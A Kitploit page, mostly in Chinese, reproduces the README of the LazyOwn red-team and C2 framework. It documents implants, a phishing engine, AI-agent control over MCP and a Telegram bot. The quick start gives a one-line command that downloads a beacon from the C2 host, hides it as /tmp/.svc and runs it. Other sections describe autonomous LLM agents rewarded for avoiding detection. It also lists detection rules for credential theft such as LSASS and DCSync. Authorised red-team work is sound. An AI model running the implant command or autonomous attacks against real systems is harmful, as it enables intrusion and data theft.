Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
LazyOwn — 红队框架与多操作员C2平台,具备AI代理、可塑植入物、rootkit、钓鱼引擎以及覆盖完整攻击杀伤链的741条CLI命令。 | Kitploit
工具/GitHubGitHub/grisuno/lazyown
渗透测试框架漏洞扫描器漏洞利用框架后渗透利用钓鱼攻击渗透测试命令与控制红队Payload 开发远程访问木马AI 安全
228451322小时2分前Kitploit 审核通过
GitHub
grisuno/lazyown

LazyOwn

红队框架与多操作员C2平台,具备AI代理、可塑植入物、rootkit、钓鱼引擎以及覆盖完整攻击杀伤链的741条CLI命令。

查看仓库网站

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

LazyOwn — 集成 AI 代理、Linux BOF 信标、YARA+Nuclei 市场的红队框架

LazyOwn_Redteam_framework

stars release docker ci License: GPL v3 Ask DeepWiki

741 条 CLI 命令。多操作员 C2。153 个面向 AI 代理的 MCP 工具。唯一支持 Linux BOF 并内置 YARA/Nuclei 市场的开源 C2。

60 秒试用(无需安装)黄金路径(每次交战)一键自动打点
docker run -it ghcr.io/grisuno/lazyown:latestping > lazynmap > auto_populate > facts_show > recommend_nextengage 10.10.11.5

golden path demo C2 collab demo MCP AI demo

更多演示

前 7 条命令侦察循环
first stepsrecon loop
从 CLI 操作 C2向信标下发命令
C2 CLIissue to C2

完整演练:QUICKSTART.md(5 分钟) · 80/20 指南:ESSENTIALS.md · HTB 端到端:docs/examples/htb-lame-walkthrough.md · 客观对比:COMPARISON.md

为什么选择 LazyOwn 而非 Sliver / Havoc / Mythic / Caldera / Metasploit

能力LazyOwnSliverHavocMythicCalderaMetasploit
Linux BOF 支持是否否否否否
内置 YARA + Nuclei 市场是否否否否否
面向 AI 代理的 MCP 服务器(153 个工具)是否否否否否
LLM 操作员 + 多代理蜂群是否否否否否
多操作员 C2 + 钓鱼引擎是部分部分部分部分部分

完整表格:COMPARISON.md。发现错误?提交 issue,我们会修复。```sh ██▓ ▄▄▄ ▒███████▒▓██ ██▓ ▒█████ █ █░███▄ █ ▓██▒ ▒████▄ ▒ ▒ ▒ ▄▀░ ▒██ ██▒▒██▒ ██▒▓█░ █ ░█░██ ▀█ █ ▒██░ ▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██ ██░▒██░ ██▒▒█░ █ ░█▓██ ▀█ ██▒ ▒██░ ░██▄▄▄▄██ ▄▀▒ ░ ░ ▐██▓░▒██ ██░░█░ █ ░█▓██▒ ▐▌██▒ ░██████▒▓█ ▓██▒▒███████▒ ░ ██▒▓░░ ████▓▒░░░██▒██▓▒██░ ▓██░ ░ ▒░▓ ░▒▒ ▓▒█░░▒▒ ▓░▒░▒ ██▒▒▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░ ░ ▒ ░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ▓██ ░▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ░░ ░ ▒░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ▒ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░

root@kitploit:~
[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y2Z73AV)


LazyOwn 不提供任何担保。这是自由软件,你可以根据 GNU 通用公共许可证 v3 的条款重新分发它。
有关使用本软件的详细信息,请参阅 LICENSE 文件。

 # LazyOwn RedTeam Framework v0.2.161

LazyOwn 是一个专业的红队框架和命令与控制(C2)平台,专为渗透测试人员、红队和安全研究人员打造。它提供 741 个 CLI 命令、126 个别名、153 个面向 AI 代理的 MCP 工具、一个多操作员 Web C2 仪表板,以及 137 个 YAML/Lua 插件集成,覆盖 Linux、Windows、macOS 和 BSD 上的完整杀伤链。

**v0.2.161 新增内容:** 集成市场,包含 YARA 规则 + Nuclei 模板、`auto_pwn` 自主利用、用于威胁情报驱动侦察的 `hunt` 命令、命令后提示引擎、自动会话数据加密、游戏化 ELO/徽章,以及 7 个新的 APT 剧本。

## 三条命令快速上手

初次使用?这就是完整的入门路径。完整演练:[`QUICKSTART.md`](https://github.com/grisuno/lazyown/blob/main/QUICKSTART.md)。```bash
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn
bash install.sh        # virtualenv + pinned dependencies + C2 certificates
./run                  # launches the shell; first run offers the setup wizard

默认安装很轻量;添加 --with-ml 以安装庞大的 torch/CUDA 栈,添加 --with-ollama 以安装本地 LLM 运行时,添加 --with-tools 以安装常见的外部二进制文件。依赖项固定在 requirements.txt(跨平台核心)和 requirements-ml.txt(可选 ML)中;pyproject.toml 是唯一事实来源。

Docker

对于隔离、可复现的测试任务,请参阅 lazyown-docker/README.md。```bash cd lazyown-docker ./mkdocker.sh build ./mkdocker.sh run --vpn 1

root@kitploit:~
然后,在 `(LazyOwn) >` shell 中:```text
doctor          # preflight: verifies Python, venv, packages, certs, SecLists, tools
wizard          # guided config (auto-detects lhost, walks 8 steps incl. LLM provider)
ping            # confirm the target is up and detect its OS
lazynmap        # full port + service scan

如果 doctor 报告阻塞性故障(红色),请先修复它再继续——它会告诉你缺失内容对应的确切 pip install / apt install 命令。警告(黄色)是可选的特性,目前可以忽略。

核心架构

LazyOwn 围绕模块化、命令驱动的架构构建,为安全测试工作流提供灵活性和可扩展性。

diagrama_lazyown

LazyOwn 集成了基于 cmd2 构建的命令行界面(CLI)和基于 Flask 构建的 Web 图形界面(GUI)。参数作用域限定在 payload.json 中,从而在各工具之间实现一致的配置。该框架支持对手模拟、通过 cron 命令进行任务调度,以及持久化的自动化威胁模拟工作流。

image

image

详情请参见 CONTRIBUTING.md。

LazyOwn Skills — MCP 集成

通过模型上下文协议(MCP)将 Claude Code 连接到 LazyOwn 框架。该 MCP 服务器暴露了 153 个工具,覆盖完整的交战生命周期。

文件

文件用途
skills/lazyown_mcp.pyMCP 服务器 — 向 Claude 暴露 153 个 LazyOwn 工具
skills/lazyown.mdClaude Code 技能 / 斜杠命令文档
skills/autonomous_daemon.py自主执行守护进程(目标驱动,步骤之间无需 Claude)
skills/hive_mind.py多智能体蜂后 + 工蜂系统,带 ChromaDB 记忆
skills/lazyown_policy.py用于 auto_loop 的基于奖励的策略引擎
skills/lazyown_facts.py从 nmap XML 和工具输出中提取结构化事实
skills/lazyown_parquet_db.pyParquet 知识库:会话历史、GTFOBins、LOLBas、ATT&CK

快速开始(5 分钟获得第一个 shell)

完整指南:QUICKSTART.md```bash

1. Clone and install (light by default; add --with-ml for the 2 GB torch/CUDA stack, --with-ollama for the local LLM)

git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn && bash install.sh

2. Launch, verify the install, then run the wizard

./run (LazyOwn) > doctor # preflight: Python, venv, packages, certs, SecLists, tools (LazyOwn) > wizard # auto-detects lhost, walks 8 config steps incl. LLM provider

Heavy optional dependencies (pycryptodome, python-libnmap, impacket, ...) are

imported lazily: a missing package degrades only its feature instead of

crashing the shell, and the dependent command raises a clear "pip install ..."

error when used. To audit them without launching the shell (works even if rich

or cmd2 are broken): python3 -m core.dependencies

3. Define your authorized scope, then recon

(LazyOwn) > scope add 10.10.11.0/24 && scope mode enforce (LazyOwn) > ping && lazynmap && auto_populate && facts_show

4. Start C2 (separate terminal)

bash fast_run_as_r00t.sh --no-attach --vpn 1

5. Get a shell — Linux BOF-capable beacon

(LazyOwn) > blacksandbeacon

Then on target: curl -sk "http://:/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &

6. Invite teammates (multi-operator)

(LazyOwn) > collab_join alice

Prints: https://:<c2_port>/collab/?operator=alice

root@kitploit:~
---

## 多操作员协作

LazyOwn 的协作层通过服务器发送事件(SSE)提供实时团队服务器功能。它在 `lazyc2.py` 启动时自动激活。

**浏览器仪表盘** — 在团队中任意浏览器中打开:```
https://<lhost>:<c2_port>/collab/?operator=<your_handle>

终端 SSE 流:```bash curl --insecure -N "https://:<c2_port>/collab/stream?operator=alice" | jq .

root@kitploit:~
**向所有操作员发布发现结果**:```bash
curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/publish \
  -H "Content-Type: application/json" \
  -d '{"type":"finding","operator":"alice","payload":{"target":"10.10.11.5","detail":"root via CVE-2024-xxxx"}}'

锁定目标(防止两个操作员运行同一工具):```bash curl --insecure -sk -X POST https://:<c2_port>/collab/lock
-H "Content-Type: application/json"
-d '{"target":"10.10.11.5","operator":"alice","ttl_secs":300}'

root@kitploit:~
| 端点 | 方法 | 描述 |
|---|---|---|
| `/collab/` | GET | 多操作员浏览器仪表盘 |
| `/collab/stream?operator=<name>` | GET (SSE) | 实时事件流 |
| `/collab/operators` | GET | 活跃操作员列表 |
| `/collab/publish` | POST | 广播结构化事件 |
| `/collab/lock` | POST | 获取建议性目标锁 |
| `/collab/unlock` | POST | 释放目标锁 |
| `/collab/locks` | GET | 所有活跃锁 |
| `/collab/history?n=100` | GET | 最近 N 个事件 |

从 CLI 使用:`collab_join <handle>` 会打印指定操作员的所有 URL。

---

## MCP 快速开始

LazyOwn 通过 Model Context Protocol (MCP) 暴露其完整框架。同一服务器可与 Claude Code、Claude Desktop、Hermes Agent 和 OpenCode 配合使用——选择与你的环境匹配的集成方式。

### Claude Code```bash
bash scripts/setup_hermes_mcp.sh

或者将 .mcp.example.json 复制为 .mcp.json,并将 LAZYOWN_DIR 设置为该检出目录的绝对路径:```json { "mcpServers": { "lazyown": { "command": "python3", "args": ["${LAZYOWN_DIR}/skills/lazyown_mcp.py"], "env": { "LAZYOWN_DIR": "${LAZYOWN_DIR}" } } } }

root@kitploit:~
安装 slash 命令(可选):```bash
cp skills/lazyown.md ~/.claude/commands/lazyown.md

重启 Claude Code 后,所有 lazyown_* 工具均可用。

Hermes Agent

LazyOwn 原生支持 Hermes。skills/hermes-lazyown/ 集成层提供了一个紧凑的、带命名空间的工具接口,针对 Hermes 上下文窗口进行了优化,支持检查点恢复、动态规则生成和原生委托规划。

在 ~/.hermes/config.yaml 中注册:```yaml mcp_servers: hermes-lazyown: command: python3 args: ["${LAZYOWN_DIR}/skills/hermes-lazyown/mcp_server.py"] env: LAZYOWN_DIR: "${LAZYOWN_DIR}"

root@kitploit:~
然后使用 `/reload-mcp` 在 Hermes 中重新加载 MCP 工具。

完整的 Hermes 集成指南请参见 `skills/hermes-lazyown/README.md`。

### OpenCode

LazyOwn 通过 **LazyOwnOpenCodeAdapter** 对 OpenCode 友好:```bash
git clone https://github.com/grisuno/LazyOwnOpenCodeAdapter.git
cd LazyOwnOpenCodeAdapter && npm install
npm run build

该适配器将 LazyOwn 的 MCP 服务器桥接到 OpenCode CLI,以 OpenCode 原生的提示词和工作流暴露相同的 lazyown_* 工具集。

完整设置:https://github.com/grisuno/LazyOwnOpenCodeAdapter

环境变量

变量默认值描述
LAZYOWN_DIRskills/ 的父目录LazyOwn 根目录
LAZYOWN_C2_HOSTpayload.json lhostC2 服务器地址
LAZYOWN_C2_PORTpayload.json c2_portC2 服务器端口
LAZYOWN_C2_USERpayload.json c2_userC2 用户名
LAZYOWN_C2_PASSpayload.json c2_passC2 密码

MCP 工具组(153 个工具)

组工具数描述
核心执行7run_command(现支持 dry_run + confirm)、get/set_config、list_modules、discover_commands、command_help、palette
审计与上下文6target_context、tasks_cleanup、evidence_grep、session_diff、run_command_async、job_status
目标管理3add_target、list_targets、set_active_target
C2 / 植入体控制10c2_command、c2_status、get_beacons、run_api、c2_profile、c2_vuln_analysis、c2_redop、c2_search_agent、c2_script、c2_adversary
会话感知4session_status、session_state、list_sessions、read_session_file
自主循环3auto_loop、policy_status、recommend_next
ACI — 自主战役情报3aci_plan、aci_status、aci_replan
反应式情报2reactive_suggest、bridge_suggest
目标与规划4inject_objective、next_objective、soul、read_prompt
知识库9parquet_query/annotate、facts_show、cve_search、searchsploit、rag_index/query、threat_model
记忆与学习3memory_recall/store、eval_quality
战役与报告7campaign、campaign_tasks、generate_report、misp_export、collab_publish、timeline
剧本2playbook_generate、playbook_run
附加组件、工具与插件3list_addons/plugins、create_addon/tool
调度2cron_schedule、daemon
AI 代理5run_agent、agent_status/result、list_agents、llm_ask
事件引擎4poll_events、ack_event、add_rule、heartbeat_status
SWAN MoE+RL4swan_run、swan_ensemble、swan_status、swan_route

完整文档:skills/README.md 和 skills/lazyown.md。

审计模式 MCP 改进

在 skills/lazyown_mcp_helpers.py 中添加,使自主审计更高效且更不易出错。逻辑位于纯函数模块中,因此可以独立进行单元测试(tests/test_mcp_improvements.py)。

工具 / 参数功能重要性
lazyown_session_init(format='json', include_recommend=true)以结构化字典而非横幅形式返回 SITREP;可选嵌入排名前三的推荐操作。每次调用节省约 5KB 的装饰文本;代理可在消费前进行过滤。
lazyown_campaign_sitrep(format='json')为主班次报告提供相同的 JSON 选项。两个态势工具格式一致。
lazyown_target_context(host, port=N)聚合单个 (host, port) 元组的开放端口、世界模型凭据(含来源 + 置信度)、漏洞、pwntomate 证据新鲜度以及 nmap 新鲜度。在决定对目标的下一步操作时,替代 4-5 次单独查询。
lazyown_tasks_cleanup(dry_run=true, min_confidence=0.5)审计 sessions/tasks.json 并标记嵌入凭据实际上是时间戳 / URL / IP / 重复项的条目。传入 dry_run=false 可重写文件(会先写入 .bak)。监视器常将日志时间戳变成“凭据”;在真实战役中这可清除 100+ 个噪声任务。
`lazyown_evidence_grep(pattern, scope='alllootnmap
lazyown_run_command(command, dry_run=true)预检:返回基础命令、二进制路径、OS 要求与当前 OS、将重复的产物、缺失的 payload 键——而不执行。防止误重复运行 30 分钟的扫描;在启动前标记针对 Linux 目标的仅 Windows 工具。
lazyown_run_command_async(command, timeout) + lazyown_job_status(job_id)针对长命令(lazynmap、pwntomate、auto_loop)的后台作业模式。立即返回 job_id。使代理不再阻塞于文档标注为 ≥30 分钟的命令。
lazyown_session_diff(take=true)报告 sessions/ 中新增 / 修改 / 删除的文件,以及自上次快照以来的新凭据 / 任务 ID。使班次交接明确;适合作为每个新会话的首次调用。
确认门(confirm=true)lazyown_c2_command、lazyown_c2_redop、lazyown_c2_adversary,以及任何主体匹配 rm -rf / exfil / wipe / encrypt-file 的 run_command,现在都需要显式的 confirm=true 参数。防止自主循环意外执行破坏性操作。
凭据的来源 + 置信度通过 target_context 暴露的每个凭据都包含 is_likely_credential、confidence、classification,以及发现时的 provenance 块(source_file、line_no、captured_at)。

审计模式 CLI 增强

cli/cli_enhancements.py 中的 SOLID 扩展层通过现有的 CommandSet 自动发现机制(cli/commands/audit.py)接入 cmd2 shell。除了两个小钩子(lazy 别名加载、completedefault 回退)外,无需修改 27k 行的 lazyown.py 核心。

命令 / 钩子功能支撑组件
fz [query]对每个 do_*、别名、插件和附加组件进行模糊命令查找。评分顺序为精确 > 前缀 > 子串 > 序列相似度。FuzzyCommandIndex
form <command>引导操作员为具有众多标志的命令(当前为 phishing、venom、evil)填写交互式参数表单。验证必填字段和 options 枚举;在非交互式 IO 下回退到默认值。InteractiveForm、FormSpec
status_tail [target]解析最新的 sessions/scan_<target>.partial/.nmap 并打印开放端口、完成百分比和最后一行,使操作员无需离开 shell 即可监控长时间扫描。LiveStatusTail
grep_log <pattern> [--cmd <name>]在已执行命令及其输出的近期记录中进行正则搜索。跨重启持久化(sessions/_cli_transcript.jsonl)。TranscriptStore
reload_addons轮询 lazyaddons/ 和 plugins/ 并重新注册自上次扫描以来发生变化的任何内容,无需重启 shell。AddonHotReloader
audit_complete_keys <command> [partial]显示 payload 感知补全器对给定命令的建议内容。用于验证补全行为。PayloadAwareCompleter
completedefault(Tab)Cmd2 钩子现在会落到 payload 感知补全器,为 set/assign 建议 payload 键,为 target 建议 IP 值,为 gobuster/ffuf 建议字典键,为 run 建议附加组件名称,为 plugin 建议插件名称,为 evil/cme/secretsdump 建议捕获的凭据。PayloadAwareCompleter
动态别名解析cli/aliases.py 现在默认 lazy=True:别名模板保留其 {rhost}/{lhost}/等占位符,并在执行时针对 self.params 渲染。set rhost X 会在下一次按键时传播到每个别名(无需重启 shell)。仍可通过 lazy=False 使用预替换。DynamicAliasResolver、

这些原语与框架无关,并依赖小型 typing.Protocol 接口(PayloadProvider、CommandLister、TerminalIO),因此可以独立进行单元测试。参见 tests/test_cli_enhancements.py(36 个测试)。

模糊下拉自动补全

cmd2 shell 在 GNU readline 之上安装了一个由 curses 驱动的模糊选择器(cli/fuzzy_picker.py)。当按下一次 Tab 键且有两个或更多补全可用时,选择器会在终端底部打开一个带边框的下拉框,显示每个匹配项及其描述。评分器优先考虑精确、前缀和子序列匹配,而非子串和相似度(与独立 fz 命令使用的排名相同),并且查询的匹配字符会在每一行中高亮显示,使操作员能看到候选者出现在列表中的原因。

导航:↑ / ↓ 移动,Page Up / Page Down 跳转,Home / End 定位,Backspace 就地编辑查询,Tab 或 Enter 将高亮命令插入提示符,Esc 或 Ctrl-C 取消。当只有一个候选匹配时,保留 readline 的正常自动插入行为,因此选择器绝不会妨碍快速操作员。几何布局、颜色和字形由 PickerConfig 驱动,payload.json 中可选的 fuzzy_picker 块可以覆盖其任何字段(例如 "max_visible_rows": 8),无需修改代码。

可配置的 Neon Box 提示符 — config_banner

cmd2 shell 渲染一个三行的 Neon Box 提示符,由一组规范片段(user_host、iface、lhost、rhost、domain、public_ip、cwd、git、venv、time、kernel、version、battery_load)组装而成。渲染器在 cli/banner_config.py 中实现为一个小的 SOLID 栈:每条信息一个 SegmentRenderer、一个 SegmentRegistry、一个 BannerSettings 值对象,以及一个输出 ANSI 彩色内容的 BannerRenderer。公共 IP、内核版本和 LazyOwn 版本都经过 TTL 缓存,因此首次渲染后提示符保持亚毫秒级。

config_banner shell 命令打开一个 Powerlevel10k 风格的 curses 向导,包含三个标签页——Segments、Colors、Glyphs——并在面板底部锚定显示结果提示符的实时预览。Tab / Shift+Tab 循环切换标签页;↑ / ↓ 在活动标签页内移动;Enter 保存到 payload.json 的 banner 块下;Escape 取消。各标签页绑定:

标签页操作键
SegmentsSpace 切换片段的开/关;a 启用所有片段;n 禁用所有片段;d 恢复出厂默认值。
ColorsSpace / → 循环到下一个命名颜色(bright_green、bright_cyan、bright_magenta、…);← 循环返回;d 恢复该片段的默认颜色。
GlyphsSpace / → 循环到聚焦槽位的下一个字符(top_left、vertical、bullet_primary、arrow、prompt_char_user、…);← 循环返回;d 恢复该槽位的默认字形。

保存后 shell 提示符立即刷新——无需重启。没有 TTY 的操作员(CI、脚本)仍可通过 config_banner show 和 config_banner reset 驱动系统,或手动编辑 payload:```json "banner": { "enabled": ["user_host", "iface", "rhost", "domain", "cwd", "git", "venv", "time"], "colors": {"user_host": "bright_green", "rhost": "bright_red", "domain": "bright_yellow"}, "glyphs": {"top_left": "┌", "bottom_left": "└", "horizontal": "─", "vertical": "│", "bullet_primary": "❯", "arrow": "→"} }

root@kitploit:~
颜色名称会根据 `ColorRegistry` 进行校验,字形字符会根据 `GlyphRegistry` 进行校验;任何未知内容都会静默回退到工厂默认值,因此格式错误的负载永远不会破坏提示符。

### 图感知导航 — 来自 graphify 的操作员 + 代理 UX

`cli/graph_advisor.py` 加载由 [`/graphify`](https://graphify.dev) 在 LazyOwn 源代码树上生成的知识图谱(`graphify-out/graph_lazyown.json` — 约 1500 个节点,约 2900 条边,14 个社区),并将其暴露给 cmd2 shell 和 MCP 服务器。该顾问是一个单文件 SOLID 栈 — `GraphLoader`(mtime 缓存的文件 IO)、`GraphIndex`(内存中的邻接 / 度数 / 社区索引)、`GraphScorer`(纯排序原语)、`GraphAdvisor`(编排器)— 所有常量都保存在 `GraphAdvisorConfig` 数据类上。

**操作员命令(cmd2 shell)**

| 命令 | 用途 |
|---------|---------|
| `graph_search <query> [limit]` | 按标签、id 或源文件模糊搜索节点。 |
| `neighbors <node> [depth] [limit]` | 从节点向外遍历图,并显示边关系 / 置信度。 |
| `god_nodes [N]` | 显示连接最多的节点 — 框架的核心抽象。 |
| `suggest_next [seeds…] [N]` | 通过从最近活动向外遍历来推荐下一步命令。没有种子时,它会读取 `sessions/LazyOwn_session_report.csv` 并从那里获取种子。 |

shell 的 `default()` 钩子现在会将未知的 `do_*` 命令通过同一个顾问以及现有的 `FuzzyCommandIndex` 处理,因此输入 `ddo_lazynmap` 的操作员会立即看到 *"Did you mean: do_lazynmap, do_lazynmap_quick, …?"*,然后才出现提示。

**MCP 工具(Claude Code、Claude web、任何 MCP 代理)**

| 工具 | 用途 |
|------|---------|
| `lazyown_graph_summary` | 节点 / 边 / 社区计数以及解析后的图路径。 |
| `lazyown_graph_search` | 带 `budget_tokens` 上限的模糊节点搜索,因此 JSON 响应永远不会撑爆代理的上下文窗口。 |
| `lazyown_graph_neighbors` | 带边关系和置信度的分层邻接遍历 — 经典的“X 依赖什么?”查询。 |
| `lazyown_graph_suggest_next` | 下一步推荐;接受显式的 `recent` 列表或读取会话记录。 |

每个 MCP 图工具都会就地裁剪列表字段以适配 `budget_tokens`(默认 1500)。当图缺失时,每个工具都会返回 `{"available": false, "reason": "..."}` 而不是崩溃 — 操作员会被告知运行一次 `/graphify .`,然后一切就开始正常工作。

该顾问按 `(path, mtime)` 进行缓存,因此新的 `/graphify` 重建会在下一次 CLI 命令或 MCP 调用时自动被拾取,而无需重启 shell 或 MCP 服务器。参见 `tests/test_graph_advisor.py` 中覆盖加载器、索引、评分器以及完整顾问 API 的 20 个单元测试。

### 内联响应式提示 — 非阻塞的下一步建议

`cli/reactive_hints.py` 通过 `register_postcmd_hook` 挂接到 cmd2 命令后管道,并在每个命令输出下方、下一个提示符出现之前打印一行暗淡的提示:```
  ↳ do_gobuster · do_enum4linux · do_ffuf

该建议来自 graphify 知识图谱(与 suggest_next 使用的是同一个 GraphAdvisor),因此具有结构性依据——并非泛泛的列表。该钩子完全非阻塞:它在 cmd2 渲染提示符之前就返回,因此操作员可以立即开始输入下一条命令。

控制

操作方法
为当前会话禁用提示set enable_inline_hints false
重新启用set enable_inline_hints true
永久生效set enable_inline_hints false 然后 save

跳过列表中的命令(help、?、exit、set、show、palette、dashboard、suggest_next、graph_search、neighbors、god_nodes)永远不会产生提示行——它们是元命令,建议只会增加噪音。

当 graphify 图谱不存在时,该钩子会静默返回。运行一次 /graphify . 来构建图谱,提示就会在下一条命令时开始出现。

操作员 TUI 仪表盘 — dashboard

cli/dashboard_tui.py 是一个全屏 Textual 仪表盘,通过以下命令从 shell 启动:``` dashboard

root@kitploit:~
它在打开时会阻塞 shell(类似于 `htop` 或 `lazygit`)。按 **Q** 或
Ctrl-C 关闭并返回 cmd2 提示符。

**布局**```
┌─ LazyOwn RedTeam Dashboard ─────────────────────────────────────────────────┐
│ TARGET 10.10.11.5  ATTACKER 10.10.14.5  DOMAIN target.htb  PHASE RECON  OS  │
├─────────────────────┬─────────────────────────────────┬─────────────────────┤
│  Kill Chain         │  Recent Commands                │  Ops                │
│  ✔ Recon            │  ● lazynmap        2026-05-11   │  Objective:         │
│  ▶ Enum             │  ● ping            2026-05-11   │  Initial Access     │
│  ○ Exploit          │  ● gobuster        2026-05-11   │                     │
│  ○ PrivEsc          │                                 │  Credentials: 0     │
│  ○ Lateral          │                                 │  Hashes: 0          │
│  ○ Exfil            │  Config                         │  Beacons: 0         │
│  ○ Report           │  Target: 10.10.11.5             │                     │
│                     │  C2 Port: 4444                  │                     │
├─────────────────────┴─────────────────────────────────┴─────────────────────┤
│  ↳ next: do_gobuster · do_enum4linux · do_ffuf · do_nikto                   │
└──────────────────────────────────── [Q] Quit  [R] Refresh  [?] Help ────────┘

数据源(每 5 秒自动刷新)

面板来源
目标 / 阶段 / 操作系统payload.json、sessions/world_model.json
杀伤链进度sessions/world_model.json → completed_phases
最近命令sessions/LazyOwn_session_report.csv
目标sessions/world_model.json、sessions/tasks.json
凭据 / 哈希sessions/credentials*.txt、sessions/hash*.txt
信标sessions/beacons.json
图谱提示graphify-out/graph_lazyown.json

需要 pip install textual(已添加到 install.sh)。

命令面板与图谱感知发现

lazyown_palette MCP 工具(也可通过 palette CLI 命令和 /palette Web 视图访问,并在每个 C2 页面上提供全局 Ctrl+K / Cmd+K 覆盖层)让智能体和操作员无需滚动即可浏览 422+ 个 do_* 命令。模式:

模式示例描述
概览palette按阶段统计命令数量。
阶段palette recon杀伤链某一阶段中的每条命令,附带一行摘要。
阶段 + 过滤palette enum nmap通过自由文本查询缩小阶段列表范围。
搜索palette --search ldap跨名称和摘要的模糊搜索。
详情palette --info do_lazynmap完整条目加上 graphify 派生的 calls 和 related 邻居(哪些其他命令与此命令共享辅助函数)。
下一阶段palette --next recon杀伤链顺序中后续阶段的推荐命令。

详情视图的 calls / related 列表来自 graphify-out/graph_lazyown.json(由 graphify 技能重新生成);当该文件不存在时,面板会静默降级为仅显示阶段数据。


Telegram Hermes Bot

telegram_hermes.py 机器人通过 MCP 层和 Hermes 网关将 Telegram 桥接到完整的 LazyOwn 框架。它支持直接 shell 命令执行、自主智能体委派、cron 调度、C2 信标交互以及跨平台消息传递。

文件

文件用途
telegram_hermes.pyTelegram 机器人 — 将 Telegram 桥接到 LazyOwn MCP 和 Hermes 网关
run_telegram_hermes.sh使用专用 venv 的启动脚本
venv_telegram/包含 python-telegram-bot 依赖项的 Python 虚拟环境

快速开始```bash

1. Create the dedicated virtual environment

cd LazyOwn python3 -m venv venv_telegram source venv_telegram/bin/activate pip install python-telegram-bot nest_asyncio requests

2. Configure your bot token in payload.json

python3 -c "import json; p=json.load(open('payload.json')); p['telegram_token']='YOUR_BOTFATHER_TOKEN'; json.dump(p,open('payload.json','w'),indent=2)"

3. Launch the bot

./run_telegram_hermes.sh

root@kitploit:~
### Bot 命令

| 命令 | 描述 |
|---------|-------------|
| `/start <secret>` | 使用 `payload.json` 中的 C2 密钥进行身份验证 |
| `/cmd <command>` | 执行任意 LazyOwn shell 命令 |
| `/sitrep` | 完整的战役态势报告 |
| `/config [key] [val]` | 查看或设置 payload.json 值 |
| `/addcli <client_id>` | 设置活动的 C2 客户端 |
| `/clients` | 列出在线的 C2 植入体 |
| `/c2 <command>` | 向 C2 信标发送命令 |
| `/agent <goal>` | 运行自主 Groq/Ollama 代理 |
| `/delegate <goal>` | 将任务委托给 Hermes 子代理 |
| `/cron <schedule> <cmd>` | 安排周期性的 LazyOwn 命令 |
| `/status` | 显示守护进程和自主状态 |
| `/stop` | 停止任何正在运行的自主守护进程 |
| `/download <file>` | 从 sessions/ 下载文件 |
| 上传文档 | 将文件上传到 C2 信标 |

任何不以 `/` 为前缀的纯文本消息都被视为直接的 LazyOwn 命令。速率限制(每分钟 5 条命令)和会话超时(30 分钟)会被强制执行。

### 架构

该机器人使用与 MCP 服务器(`skills/lazyown_mcp.py`)相同的基于 PTY 的命令执行方式,因此每个 LazyOwn 命令、别名和插件都能正常工作,无需直接进行 Python 导入。自主任务(`/agent`、`/delegate`)通过 LazyOwn shell 启动 Groq 或 Ollama 代理,而 C2 命令(`/c2`、`/clients`)使用经过身份验证的 `/api/command` 和 `/get_connected_clients` 端点。

---

## 高级 AI 架构(MoE + RL + SWAN + Hive Mind)

LazyOwn 集成了一个世界级的多代理 AI 技术栈,能够在每次交战中自适应并不断改进:

### 专家混合(MoE)— `modules/moe_router.py`

五个 LLM 专家通过能力标签、基础权重和成本层级进行注册:

| 专家 | 后端 | 优势 |
|--------|---------|-----------|
| `groq_fast` | Groq llama-3.1-8b-instant | 侦察、枚举、快速决策 |
| `groq_powerful` | Groq llama-3.3-70b-versatile | 利用、后渗透、复杂推理 |
| `groq_deepseek_r1` | Groq deepseek-r1-distill-llama-70b | 权限提升、逐步推理 |
| `ollama_reason` | Ollama deepseek-r1:1.5b | 离线、隐私安全、详细分析 |
| `groq_gemma` | Groq gemma2-9b-it | 横向移动、凭据分析 |

路由使用温度缩放的 softmax(`T = max(0.5, 1.5/(1+calls/50))`)对调整后的权重进行计算。权重通过每个专家奖励随时间的指数移动平均进行自我调整。

### 基于模型的强化学习(RLM)— `modules/rl_trainer.py`

表格型 Q-learning 在交战会话中训练路由策略:```
State:  (task_type, engagement_phase, recent_reward_bucket)
Action: expert_id
Reward: r_raw - λ * detection_prob * |r_raw|    (λ=0.5)
Update: Q(s,a) ← Q(s,a) + α * [r + γ * max_a' Q(s',a') - Q(s,a)]

超参数:α=0.10,γ=0.90,ε_start=0.20,ε_min=0.05,ε_decay=0.995。Epsilon-greedy 探索按每次更新衰减。Q 值跨会话持久化到 sessions/expert_qvalues.json。

SWAN 编排器 — skills/swan_agent.py

顶层集成层将 MoE + RL + 检测预言机 + 蜂巢记忆连接起来:

  • swan_run:单专家执行,带 RL 引导的路由和执行后 Q 更新
  • swan_ensemble:通过 ThreadPoolExecutor 并行运行 N 个专家,由 WeightedTextAggregator 合成
  • OutcomeEvaluator:当检测概率 ≥ 70% 时奖励 = 0(检测感知的奖励塑形)
  • 每个结果都存储在蜂巢记忆(ChromaDB)中,用于跨会话学习

检测预言机(蓝队镜像) — modules/detection_oracle.py

在执行前使用 17 条 Sigma-lite 规则预测检测概率,覆盖: 凭据访问(LSASS、SAM、DCSync)、横向移动(PsExec、WMI、evil-winrm)、权限提升(令牌模拟、命名管道)、漏洞利用、侦察、C2 和暴力破解。

概率聚合:P(detect) = 1 - ∏(1 - P_i),对所有触发的规则进行计算。

紫队闭环 — modules/auto_purple.py

